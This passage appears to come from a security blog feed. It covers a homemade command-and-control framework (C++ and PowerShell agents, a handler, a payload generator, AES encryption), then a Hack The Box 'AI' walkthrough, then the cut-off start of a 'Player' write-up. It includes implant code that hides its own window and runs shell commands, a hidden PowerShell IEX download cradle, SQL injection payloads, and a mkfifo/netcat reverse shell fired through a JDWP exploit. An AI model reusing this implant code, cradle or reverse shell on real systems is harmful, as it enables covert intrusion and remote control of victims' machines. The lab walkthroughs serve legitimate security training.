    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"GET", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      WINHTTP_NO_ADDITIONAL_HEADERS,
                                      0,
                                      WINHTTP_NO_REQUEST_DATA,
                                      0,
                                      0,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;
}

std::string Post(std::string ip, unsigned int port, std::string uri, std::string dat)
{
    LPSTR data     = const_cast<char*>(dat.c_str());
    DWORD data_len = strlen(data);

    LPCWSTR additionalHeaders = L"Content-Type: application/x-www-form-urlencoded\r\n";
    DWORD headersLength       = -1;

    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"POST", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      additionalHeaders,
                                      headersLength,
                                      (LPVOID)data,
                                      data_len,
                                      data_len,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;

}

The shell function does almost the same thing as the shell function in the other agent; some of the code is taken from Stack Overflow and I edited it:


CStringA shell(const wchar_t* cmd)
{
    CStringA result;
    HANDLE hPipeRead, hPipeWrite;

    SECURITY_ATTRIBUTES saAttr = {sizeof(SECURITY_ATTRIBUTES)};
    saAttr.bInheritHandle = TRUE; 
    saAttr.lpSecurityDescriptor = NULL;

    
    if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0))
        return result;

    STARTUPINFOW si = {sizeof(STARTUPINFOW)};
    si.dwFlags     = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.hStdOutput  = hPipeWrite;
    si.hStdError   = hPipeWrite;
    si.wShowWindow = SW_HIDE; 

    PROCESS_INFORMATION pi = { 0 };

    BOOL fSuccess = CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    if (! fSuccess)
    {
        CloseHandle(hPipeWrite);
        CloseHandle(hPipeRead);
        return result;
    }

    bool bProcessEnded = false;
    for (; !bProcessEnded ;)
    {
        bProcessEnded = WaitForSingleObject( pi.hProcess, 50) == WAIT_OBJECT_0;

        for (;;)
        {
            char buf[1024];
            DWORD dwRead = 0;
            DWORD dwAvail = 0;

            if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL))
                break;

            if (!dwAvail)
                break;

            if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead)
                break;

            buf[dwRead] = 0;
            result += buf;
        }
    }

    CloseHandle(hPipeWrite);
    CloseHandle(hPipeRead);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return result;
}

I would like to point out an important option in the process created by the shell function which is:

si.wShowWindow = SW_HIDE; 

This is responsible for hiding the console window of the spawned process. A similar call is also added in the main() function of the agent to hide the agent’s own console window:

int main(int argc, char const *argv[]) 
{

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    ...

Agent Handler

Now that we’ve talked about the agents, let’s go back to the server and take a look at the agent handler.

An Agent object is instantiated with a name, a listener name, a remote address, a hostname, a type and an encryption key:

class Agent:

    def __init__(self, name, listener, remoteip, hostname, Type, key):

        self.name      = name
        self.listener  = listener
        self.remoteip  = remoteip
        self.hostname  = hostname
        self.Type      = Type
        self.key       = key

Then it defines the sleep time, which is 3 seconds by default as discussed. It needs to keep track of the sleep time to be able to determine whether an agent is dead when removing it; otherwise it would keep waiting forever for the agent to call back:

self.sleept    = 3
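The removal logic itself isn’t shown here, but a liveness check based on this value could look roughly like the following minimal sketch; the lastSeen attribute and the helper name are illustrative assumptions, not part of the tool’s actual code:

import time

def isProbablyDead(agent, grace=3):
    # Assumes the handler stores time.time() in agent.lastSeen on every check-in.
    # If the agent missed several sleep intervals (times a grace factor), treat it as dead.
    return time.time() - agent.lastSeen > agent.sleept * grace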

After that it creates the needed directories and files:

self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
self.tasksPath = "{}tasks".format(self.Path, self.name)

if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

And finally it creates the menu for the agent, but I won’t cover the Menu class in this post because it doesn’t relate to the core functionality of the tool.

self.menu = menu.Menu(self.name)
        
self.menu.registerCommand("shell", "Execute a shell command.", "<command>")
self.menu.registerCommand("powershell", "Execute a powershell command.", "<command>")
self.menu.registerCommand("sleep", "Change agent's sleep time.", "<time (s)>")
self.menu.registerCommand("clear", "Clear tasks.", "")
self.menu.registerCommand("quit", "Task agent to quit.", "")

self.menu.uCommands()

self.Commands = self.menu.Commands

I won’t talk about the wrapper functions because we only care about the core functions.

The first function is writeTask(), which is quite simple: it takes the task, prepends the VALID flag and writes it to the tasks path:

def writeTask(self, task):
    
    if self.Type == "p":
        task = "VALID " + task
        task = ENCRYPT(task, self.key)
    elif self.Type == "w":
        task = task
	
    with open(self.tasksPath, "w") as f:
        f.write(task)

As you can see, it only encrypts the task in the case of the powershell agent; that's because there's no encryption in the c++ agent (more on that in the encryption part).

The second function I want to talk about is clearTasks(), which simply deletes the tasks file:

def clearTasks(self):
    
    if os.path.exists(self.tasksPath):
        os.remove(self.tasksPath)
    else:
        pass

The third function is an important one called update(). It gets called when an agent is renamed and updates the paths. As seen earlier, the paths depend on the agent's name, so without calling this function the agent wouldn't be able to download its tasks.

def update(self):
    
    self.menu.name = self.name
    self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
    self.tasksPath = "{}tasks".format(self.Path, self.name)
        
    if os.path.exists(self.Path) == False:
        os.mkdir(self.Path)

The remaining functions are wrappers that rely on these functions or helper functions that rely on the wrappers. One example is the shell function which just takes the command and writes the task:

def shell(self, args):
    
    if len(args) == 0:
        error("Missing command.")
    else:
        command = " ".join(args)
        task    = "shell " + command
        self.writeTask(task)

The last function I want to talk about is a helper called displayResults, which takes the returned results and the agent name. If the agent is a powershell agent it decrypts the results, checks their validity and prints them; otherwise it just prints the results:

def displayResults(name, result):

    if isValidAgent(name,0) == True:

        if result == "":
            success("Agent {} completed task.".format(name))
        else:
            
            key = agents[name].key
            
            if agents[name].Type == "p":

                try:
                    plaintext = DECRYPT(result, key)
                except:
                    return 0
            
                if plaintext[:5] == "VALID":
                    success("Agent {} returned results:".format(name))
                    print(plaintext[6:])
                else:
                    return 0
            
            else:
                success("Agent {} returned results:".format(name))
                print(result)

Payloads Generator

Any c2 server should be able to generate payloads for its active listeners. As seen earlier in the agents part, we only need to change the IP address, port and key in the agent template, or just the IP address and port in the case of the c++ agent.

PowerShell

Doing this with the powershell agent is simple because a powershell script is just a text file, so we only need to replace the strings REPLACE_IP, REPLACE_PORT and REPLACE_KEY.

The powershell function takes a listener name and an output name. It grabs the needed options from the listener, replaces the placeholder strings in the powershell template and saves the new file in two places: /tmp/ and the listener's files path. After that it generates a download cradle that requests /sc/ (the endpoint discussed in the listeners part).

def powershell(listener, outputname):
    
    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port
    key     = listeners[listener].key

    with open("./lib/templates/powershell.ps1", "rt") as p:
        payload = p.read()

    payload = payload.replace('REPLACE_IP',ip)
    payload = payload.replace('REPLACE_PORT',str(port))
    payload = payload.replace('REPLACE_KEY', key)

    with open(outpath, "wt") as f:
        f.write(payload)
    
    with open("{}{}".format(listeners[listener].filePath, outputname), "wt") as f:
        f.write(payload)

    oneliner = "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/sc/{}\')\"".format(ip, str(port), outputname)

    success("File saved in: {}".format(outpath))
    success("One liner: {}".format(oneliner))

Windows Executable (C++ Agent)

It wasn’t as easy as it was with the powershell agent, because the c++ agent would be a compiled PE executable.

It was a huge problem and I spent a lot of time trying to figure out what to do; that was when I was introduced to the idea of a stub.

The idea is to append whatever data needs to be dynamically assigned to the end of the executable, and to design the program so that it reads its own file and pulls out the appended information.

In the source of the agent I added a few lines of code that do the following:

  • Open the file as a file stream.
  • Move to the end of the file.
  • Read 2 lines.
  • Save the first line in the IP variable.
  • Save the second line in the port variable.
  • Close the file stream.
std::ifstream ifs(argv[0]);
	
ifs.seekg(TEMPLATE_EOF);
	
std::getline(ifs, ip);
std::getline(ifs, sPort);

ifs.close();

To get the right EOF offset I had to compile the agent first, then update TEMPLATE_EOF in the agent source according to the size of the resulting file and compile again.

For example this is the current definition of TEMPLATE_EOF for the x64 agent:

#define TEMPLATE_EOF 52736

If we take a look at the size of the file we’ll find that it’s the same:

# ls -la
-rwxrwxr-x 1 ... ... 52736 ... ... ... winexe64.exe
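If you ever rebuild the agent and want to sanity-check that TEMPLATE_EOF still matches, a quick check like this works (a small sketch; the path is the x64 template used by the winexe function below):

import os

# should print 52736 for the current x64 template
print(os.path.getsize("./lib/templates/winexe/winexe64.exe"))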

The winexe function takes a listener name, an architecture and an output name. It grabs the needed options from the listener, copies the template corresponding to the selected architecture, appends the options to it and saves the new file in /tmp:

def winexe(listener, arch, outputname):

    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port

    if arch == "x64":
        copyfile("./lib/templates/winexe/winexe64.exe", outpath)
    elif arch == "x32":
        copyfile("./lib/templates/winexe/winexe32.exe", outpath)        
    
    with open(outpath, "a") as f:
        f.write("{}\n{}".format(ip,port))

    success("File saved in: {}".format(outpath))

Encryption

I’m not very good at cryptography, so this part was the hardest of all. At first I wanted to use AES and do a Diffie-Hellman key exchange between the server and the agent. However, I found that powershell can’t deal with big integers without the .NET class BigInteger, and because I’m not sure that class will always be available, I gave up on the idea and decided to hardcode the key while generating the payload; I didn’t want to risk the compatibility of the agent. I could use AES in powershell easily, but I couldn’t do the same in c++, so I decided to use a simple xor. Again there were some issues, which is why the winexe agent won’t be using any encryption until I figure out what to do.

Let’s take a look at the crypto functions in both the server and the powershell agent.

Server

The AESCipher class uses the AES class from the pycrypto library; it implements AES-256 in CBC mode.

An AESCipher object is instantiated with a key, it expects the key to be base-64 encoded:

class AESCipher:
    
    def __init__(self, key):

        self.key = base64.b64decode(key)
        self.bs  = AES.block_size

There are two functions to pad and unpad the text with zeros to match the block size:

def pad(self, s):
    return s + (self.bs - len(s) % self.bs) * "\x00"

def unpad(self, s):
    s = s.decode("utf-8")
    return s.rstrip("\x00")

The encryption function takes plain text, pads it, creates a random IV, encrypts the plain text and returns the IV + the cipher text base-64 encoded:

def encrypt(self, raw):
    
    raw      = self.pad(raw)
    iv       = Random.new().read(AES.block_size)
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    
    return base64.b64encode(iv + cipher.encrypt(raw.encode("utf-8")))

The decryption function does the opposite:

def decrypt(self,enc):
    
    enc      = base64.b64decode(enc)
    iv       = enc[:16]
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    plain    = cipher.decrypt(enc[16:])
    plain    = self.unpad(plain)
    
    return plain 

I created two wrapper functions that rely on the AESCipher class to encrypt and decrypt data:

def ENCRYPT(PLAIN, KEY):

    c   = AESCipher(KEY)
    enc = c.encrypt(PLAIN)

    return enc.decode()

def DECRYPT(ENC, KEY):

    c   = AESCipher(KEY)
    dec = c.decrypt(ENC)

    return dec

And finally there’s the generateKey function, which creates a random 32-byte key and base-64 encodes it:

def generateKey():

    key    = base64.b64encode(os.urandom(32))
    return key.decode()
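As a quick sanity check, a round trip with these helpers looks like this (a minimal usage sketch, assuming the functions above are in scope and pycrypto is installed):

key = generateKey()
enc = ENCRYPT("whoami", key)   # base64(IV + ciphertext)
dec = DECRYPT(enc, key)
print(dec)                     # whoami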

PowerShell Agent

The powershell agent uses the .NET class System.Security.Cryptography.AesManaged.

The first function is Create-AesManagedObject, which instantiates an AesManaged object using the given key and IV. It must use the same options we chose on the server side: CBC mode, zero padding and a 32-byte key:

function Create-AesManagedObject($key, $IV) {
    
    $aesManaged           = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode      = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize   = 256

After that it checks whether the provided key and IV are of type String (which means they are base-64 encoded), decodes them if necessary before using them, and then returns the AesManaged object.

if ($IV) {
        
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }
        
        else {
            $aesManaged.IV = $IV
        }
    }
    
    if ($key) {
        
        if ($key.getType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        }
        
        else {
            $aesManaged.Key = $key
        }
    }
    
    $aesManaged
}

The Encrypt function takes a key and a plain text string, converts the string to bytes, uses the Create-AesManagedObject function to create the AesManaged object and encrypts the string with a randomly generated IV.

It returns the IV plus the cipher text, base-64 encoded.

function Encrypt($key, $unencryptedString) {
    
    $bytes             = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
    $aesManaged        = Create-AesManagedObject $key
    $encryptor         = $aesManaged.CreateEncryptor()
    $encryptedData     = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
    [byte[]] $fullData = $aesManaged.IV + $encryptedData
    $aesManaged.Dispose()
    [System.Convert]::ToBase64String($fullData)
}

The opposite of this process happens with the Decrypt function:

function Decrypt($key, $encryptedStringWithIV) {
    
    $bytes           = [System.Convert]::FromBase64String($encryptedStringWithIV)
    $IV              = $bytes[0..15]
    $aesManaged      = Create-AesManagedObject $key $IV
    $decryptor       = $aesManaged.CreateDecryptor();
    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
    $aesManaged.Dispose()
    [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)

}

Listeners / Agents Persistency

I used pickle to serialize agents and listeners and save them in databases. When you exit the server it saves all of the agent and listener objects, and when you start it again it loads them back, so you don’t lose your agents or listeners.

For the listeners there’s a catch: pickle can’t serialize objects that use threads. So instead of saving the listener objects themselves, I created a dictionary that holds all the information about the active listeners and serialized that; the server loads that dictionary and starts the listeners again according to the options in it.
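The restore step itself isn’t shown below, but conceptually it boils down to something like this minimal sketch (the file name and dictionary layout are illustrative assumptions):

import pickle

# load the saved listener options and restart each listener from them
with open("data/listeners.db", "rb") as d:
    saved = pickle.load(d)   # e.g. {"http1": {"ipaddress": "10.0.0.1", "port": 8080, "key": "..."}}

for name, opts in saved.items():
    print("restarting listener {} on {}:{}".format(name, opts["ipaddress"], opts["port"]))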

I created wrapper functions that read, write and remove objects from the databases:

def readFromDatabase(database):
    
    data = []

    with open(database, 'rb') as d:
        
        while True:
            try:
                data.append(pickle.load(d))
            except EOFError:
                break
    
    return data

def writeToDatabase(database,newData):
    
    with open(database, "ab") as d:
        pickle.dump(newData, d, pickle.HIGHEST_PROTOCOL)

def removeFromDatabase(database,name):
    
    data = readFromDatabase(database)
    final = OrderedDict()

    for i in data:
        final[i.name] = i
    
    del final[name]
    
    with open(database, "wb") as d:
        for i in final:
            pickle.dump(final[i], d , pickle.HIGHEST_PROTOCOL)

Demo

I will show you a quick demo on a Windows Server 2016 target.

This is what the home screen of the server looks like:




Let’s start by creating a listener:




Now let’s create payloads; I generated all three available payload types:




After executing the payloads on the target we’ll see that the agents successfully contacted the server:




Let’s rename the agents:





I executed 4 simple commands on each agent:






Then I tasked each agent to quit.

And that concludes this blog post. As I said before, I’d appreciate all feedback and suggestions, so feel free to contact me on twitter @Ahm3d_H3sham.

If you liked the article, tweet about it. Thanks for reading.

Hack The Box - AI

By: 0xRick
25 January 2020 at 05:00

Hack The Box - AI

Quick Summary

Hey guys, today AI retired and here’s my write-up about it. It’s a medium-rated Linux box and its IP is 10.10.10.163; I added it to /etc/hosts as ai.htb. Let’s jump right in!


Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/AI# nmap -sV -sT -sC -o nmapinitial ai.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 17:46 EST
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.83s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.15 seconds
root@kali:~/Desktop/HTB/boxes/AI# 

We got ssh on port 22 and http on port 80.

Web Enumeration

The index page was empty:


By hovering over the logo a menu appears:


The only interesting page there was /ai.php. From the description (“Drop your query using wav file.”) my first guess was that it’s a speech recognition service that processes the user’s input and executes some query based on it, and there’s also a possibility that this query is a SQL query, but we’ll get to that later:


I also found another interesting page with gobuster:

root@kali:~/Desktop/HTB/boxes/AI# gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://ai.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/01/24 18:57:23 Starting gobuster
===============================================================
----------
 REDACTED
----------
/intelligence.php (Status: 200)
----------
 REDACTED
----------
===============================================================
2020/01/24 19:00:49 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/AI# 

It had some instructions on how to use their speech recognition:


I used ttsmp3.com to generate audio files and I created a test file:


But because the application only accepts wav files I converted the mp3 file with ffmpeg:

root@kali:~/Desktop/HTB/boxes/AI/test# mv ~/Downloads/ttsMP3.com_VoiceText_2020-1-24_19_35_47.mp3 .
root@kali:~/Desktop/HTB/boxes/AI/test# ffmpeg -i ttsMP3.com_VoiceText_2020-1-24_19_35_47.mp3 ttsMP3.com_VoiceText_2020-1-24_19_35_47.wav
ffmpeg version 4.2.1-2+b1 Copyright (c) 2000-2019 the FFmpeg developers
  built with gcc 9 (Debian 9.2.1-21)
  configuration: --prefix=/usr --extra-version=2+b1 --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --enable-avresample --disable-filter=resample --enable-avisynth --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librsvg --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opengl --enable-sdl2 --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-shared
  libavutil      56. 31.100 / 56. 31.100
  libavcodec     58. 54.100 / 58. 54.100
  libavformat    58. 29.100 / 58. 29.100
  libavdevice    58.  8.100 / 58.  8.100
  libavfilter     7. 57.100 /  7. 57.100
  libavresample   4.  0.  0 /  4.  0.  0
  libswscale      5.  5.100 /  5.  5.100
  libswresample   3.  5.100 /  3.  5.100
  libpostproc    55.  5.100 / 55.  5.100
[mp3 @ 0x55b33e5f88c0] Estimating duration from bitrate, this may be inaccurate
Input #0, mp3, from 'ttsMP3.com_VoiceText_2020-1-24_19_35_47.mp3':
  Metadata:
    encoder         : Lavf57.71.100
  Duration: 00:00:00.63, start: 0.000000, bitrate: 48 kb/s
    Stream #0:0: Audio: mp3, 22050 Hz, mono, fltp, 48 kb/s
Stream mapping:
  Stream #0:0 -> #0:0 (mp3 (mp3float) -> pcm_s16le (native))
Press [q] to stop, [?] for help
Output #0, wav, to 'ttsMP3.com_VoiceText_2020-1-24_19_35_47.wav':
  Metadata:
    ISFT            : Lavf58.29.100
    Stream #0:0: Audio: pcm_s16le ([1][0][0][0] / 0x0001), 22050 Hz, mono, s16, 352 kb/s
    Metadata:
      encoder         : Lavc58.54.100 pcm_s16le
size=      27kB time=00:00:00.62 bitrate= 353.8kbits/s speed= 146x    
video:0kB audio:27kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: 0.282118%
root@kali:~/Desktop/HTB/boxes/AI/test# 





SQL injection –> Alexa’s Credentials –> SSH as Alexa –> User Flag

As I said earlier, we don’t know exactly what it means by “query”, but it could be a SQL query. When I created another audio file that says it's a test I got a SQL error because of the ' in it's:


The injection part was the hardest part of this box because the audio files weren’t processed correctly most of the time, and it took me a lot of time to get my payloads to work.
The first thing I did was get the database name.
Payload:

one open single quote union select database open parenthesis close parenthesis comment database
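(Spelled out like that, the payload should presumably be transcribed into something along the lines of 1' union select database()-- , which is what makes the union-based injection work; the same idea applies to the payloads below.)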




The database name was alexa. The next thing I did was enumerate table names; my payload was like the one shown below, and I kept changing the test after from, trying possible and common names.
Payload:

one open single quote union select test from test comment database




The table users existed.
Payload:

one open single quote union select test from users comment database




From here it was easy to guess the column names: username and password. The problem with username was that it got processed as two different words, user and name, so I couldn’t make it work.
Payload:

one open single quote union select username from users comment database




password worked just fine.
Payload:

one open single quote union select password from users comment database




Without knowing the username we can’t do anything with the password. I tried alexa, which was the database name, and it worked:


We owned user.

JDWP –> Code Execution –> Root Shell –> Root Flag

Privilege escalation on this box was very easy. When I checked the running processes I found this one:

alexa@AI:~$ ps aux
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
----------
 REDACTED
----------
root      89984 18.8  5.4 3137572 110120 ?      Sl   22:44   0:06 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
----------
 REDACTED
----------
alexa@AI:~$

This was related to an Apache Tomcat server running on localhost. I looked at that server for about 10 minutes, but it was empty and I couldn’t do anything there; it was a rabbit hole. If we check the listening ports we’ll see 8080, 8005 and 8009, which is perfectly normal because these are the ports used by tomcat, but we’ll also see 8000:

alexa@AI:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8009          :::*                    LISTEN      -
alexa@AI:~$ 

A quick search on that port and how it relates to tomcat revealed that it’s used for debugging: jdwp is running on that port.

The Java Debug Wire Protocol (JDWP) is the protocol used for communication between a debugger and the Java virtual machine (VM) which it debugs (hereafter called the target VM). -docs.oracle.com

By looking at the process again we can also see this parameter given to the java binary:

-agentlib:jdwp=transport=dt_socket,address=localhost:8000

I searched for exploits for the jdwp service and found this exploit. I uploaded the python script to the box, put the reverse shell payload in a file called pwned.sh, then ran the exploit:

alexa@AI:/dev/shm$ nano pwned.sh 
alexa@AI:/dev/shm$ chmod +x pwned.sh 
alexa@AI:/dev/shm$ cat pwned.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
alexa@AI:/dev/shm$ python jdwp-shellifier.py -t 127.0.0.1 --cmd /dev/shm/pwned.sh
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8c
[+] Found Runtime.getRuntime(): id=7f40bc03e790
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'

Then from another ssh session I triggered a connection on port 8005:

alexa@AI:~$ nc localhost 8005


And the code was executed:

alexa@AI:/dev/shm$ nano pwned.sh 
alexa@AI:/dev/shm$ chmod +x pwned.sh 
alexa@AI:/dev/shm$ cat pwned.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
alexa@AI:/dev/shm$ python jdwp-shellifier.py -t 127.0.0.1 --cmd /dev/shm/pwned.sh
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8c
[+] Found Runtime.getRuntime(): id=7f40bc03e790
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x1
[+] Selected payload '/dev/shm/pwned.sh'
[+] Command string object created id:c31
[+] Runtime.getRuntime() returned context id:0xc32
[+] found Runtime.exec(): id=7f40bc03e7c8
[+] Runtime.exec() successful, retId=c33
[!] Command successfully executed
alexa@AI:/dev/shm$ 




And we owned root! That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it and follow me on twitter @Ahm3d_H3sham.
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Player

Hack The Box - Player

By: 0xRick
18 January 2020 at 05:00

Hack The Box - Player

Quick Summary

Hey guys, today Player retired and here’s my write-up about it. It was a relatively hard CTF-style machine with a lot of enumeration and a couple of interesting exploits. It’s a Linux box and its IP is 10.10.10.145; I added it to /etc/hosts as player.htb. Let’s jump right in!




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/player# nmap -sV -sT -sC -o nmapinitial player.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 16:29 EST
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
